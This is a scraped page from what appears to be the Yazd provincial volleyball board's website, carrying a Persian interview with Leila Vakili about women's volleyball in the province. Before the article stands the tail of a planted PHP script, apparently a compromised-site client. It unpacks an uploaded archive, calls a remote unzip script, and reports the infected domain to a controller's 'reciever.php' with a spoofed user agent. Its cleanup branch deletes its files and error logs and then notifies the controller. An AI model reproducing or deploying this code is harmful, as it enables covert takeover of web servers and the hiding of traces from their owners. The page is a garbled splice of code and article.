'; $data = $data1.$data2.$data3.$data4.$data5; $fas = fopen ($unzip_path, "w"); fwrite($fas, $data); fclose($fas); $unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; echo getURL($unzip_url); } } else { echo '~Can not upload archive!~'; rmdir($dir_path); exit; } if (file_exists($script_name)) { echo '~Client has been activated!~'; $file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file = fopen($file_name,"rt"); $original_file = fread($file,filesize($file_name)); fclose($file); $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); exit; } else { echo '~Can not unziped!~'; unlink($archive_path); rmdir($dir_path); exit; } } else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); } exit; } } } ?> هیات والیبال استان یزد » گفتگویی با خانم لیلا وکیلی مشاور عالی هیات والیبال استان یزد

گفتگویی با خانم لیلا وکیلی مشاور عالی هیات والیبال استان یزد

كدخبر: 144 تاريخ : ۲ بهمن ۱۳۹۳ - ۱۴:۳۱ نسخه چاپي ارسال به دوستان
گفتگویی با خانم لیلا وکیلی مشاور عالی هیات والیبال استان یزد
والیبال یکی از ورزش‎‎های گروهی ‌و محبوب در بین مردم کشورمان است که برخلاف بسیاری از ورزش‎‎های گروهی ناکام استان، در چند سال اخیر از رشد خوبی برخوردار بوده است.  این رشته ورزشی یکی از پرسابقه‏‏ترین ورزش‏‏ها در استان نیز به شمار می‎‎رود و در چند سالی که سکان این ورزش در استان را «عباسعلی […]

والیبال یکی از ورزش‎‎های گروهی ‌و محبوب در بین مردم کشورمان است که برخلاف بسیاری از ورزش‎‎های گروهی ناکام استان، در چند سال اخیر از رشد خوبی برخوردار بوده است. 

این رشته ورزشی یکی از پرسابقه‏‏ترین ورزش‏‏ها در استان نیز به شمار می‎‎رود و در چند سالی که سکان این ورزش در استان را «عباسعلی رضایی» معاون استاندار یزد برعهده گرفته، شاهد توسعه روزافزون این رشته هستیم.
استان یزد که تا چند سال پیش در لیگ برتر نماینده قدری داشت، اکنون در اندیشه ایجاد زیرساخت‎‎ها برای حضور قدرتمندتر از قبل به سر می‎‎برد، هرچند در حال حاضر یک نماینده قدرتمند در لیگ دسته یک کشور دارد. البته با درخشش هیأت استان در این سال‎‎ها و توجه به موضوع استعدادیابی در بخش والیبال بانوان، شرایط برای اعزام ۵ دختر والیبالیست استان به کمپ تیم ملی نیز فراهم شده که این سهمیه در مقایسه با برخی استان‏‏های صاحب نام کشورمان، درخور توجه است.در مورد وضعیت این رشته ورزشی در بخش بانوان به سراغ «لیلا وکیلی» مشاور عالی و البته جوان هیات والیبال استان که بیشتر عمر خود را در این ورزش سپری کرده رفتیم و با وی به گفت‎‎وگو نشستیم. مشروح این گپ و گفت را در زیر می‎‎خوانید.

به نظر شما جایگاه کنونی والیبال استان چگونه است؟
خوشبختانه والیبال در استان علاقه‌مندان و هواداران بسیار زیادی دارد و گاه مشاهده می‎‎شود که ورزشکاران رشته‌های دیگر نیز به دلیل علاقه‏‏مندی به این رشته در کلاس‌های داوری و مربیگری این رشته شرکت و با هیات همکاری می‎‎کند. به ویژه اکنون با درخشش تیم ملی، روز به روز به آمار جامعه والیبال نیز اضافه می‎‎شود. با این حال براساس ارزشیابی فدراسیون والیبال یزد در بین استان‎‎های کشور هنوز در جایگاه متوسط و در رتبه‌۱۳ کشور است.

در حال حاضر در استان چه تعداد بانوی والیبالیست و چند باشگاه‎ والیبال برای بانوان داریم؟
براساس آمار تا پایان آذر ماه سال جاری ۶۱۵ بانوی ورزشکار سازمان یافته در این رشته ورزشی فعالیت می‎‎کنند. با توجه به سالن‎هایی که اداره ورزش جوانان استان در اختیار این هیات قرار داده است و نیز تعاملی که این هیات با سازمان‏‏ها، اداره‌ها و ارگان‏‏های موجود دارند، تلاش شده است که این فضاها سازماندهی شود و در اختیار بانوان قرار گیرد.

مشکلات والیبال بانوان در یزد چیست؟
بانوان والیبالیست استان با کمبود فضای آموزشی مواجهند و به دلیل نبود اسپانسر، از حضور در لیگ‏‏ها محروم هستند. این موضوع با توجه به شرایط اقتصادی کشور در بیشتر استان‏‏ها به چشم می‌خورد.

وضعیت امکانات برای بانوان علاقه‏‏مندان به این رشته را چگونه ارزیابی می‎‎کنید؟
هیات والیبال استان نه برای آقایان و نه برای  بانوان، سالن اختصاصی دارد. ولی سعی شده است که باشگاه‎‎های تحت پوشش هیأت مجهز به توپ و تور باشند و بهترین مربیان نیز برای آموزش به کار گرفته شوند.

برای ترویج این ورزش در سطوح پایه چه برنامه‏‏ ای دارید؟
کانون استعدادیابی والیبال در شهریور ماه سال جاری آغاز به کار کرده  است. این کانون از متقاضیان ۹ تا ۱۲‌سال که عموما در مدارس والیبال استان شرکت داشته‏‏اند، آزمایش به عمل آمده است و مسابقاتی هم در همین رده سنی برگزار و به نفرات برتر جوایزی اهدا شد. به این نحو می‌توان انتظار داشت که این ورزش بیش از پیش جایگاه خود را در میان مردم به دست آورد.

سیاست‏‏ هیات والیبال استان برای توسعه این ورزش در بین بانوان به چه نحوی دنبال می‌شود؟
پرورش نیروهای لایق و مستعد برای اعزام به اردوهای تیم ملی و رشد و توسعه ورزش والیبال میان بانوان برای ایجاد سلامتی جسم و روح آنان از مهم‌ترین اهداف ماست.

عمده اقدامات هیأت از ابتدای سال تاکنون چه بوده و برنامه‌های آینده هیأت والیبال استان چیست؟
برگزاری کلاس‏‏های داوری و مربیگری، برگزاری جام رمضان، راه‏‏اندازی کانون استعدادیابی، افزایش مدارس والیبال، برگزاری دیدارهای دوستانه و مناسبتی از جمله گرامیداشت دهه کرامت، گرامیداشت روز دختر، گرامیداشت هفته عفاف و حجاب و غیره از جمله این اقدامات بوده است. همچنین برگزاری کلاس مربیگری درجه۳، مربیگری درجه ۲ و برگزاری لیگ در بهمن ماه را تا پایان سال در برنامه داریم.

مدیر

مدیر

هیات والیبال استان یزد

More Posts

Comments are closed.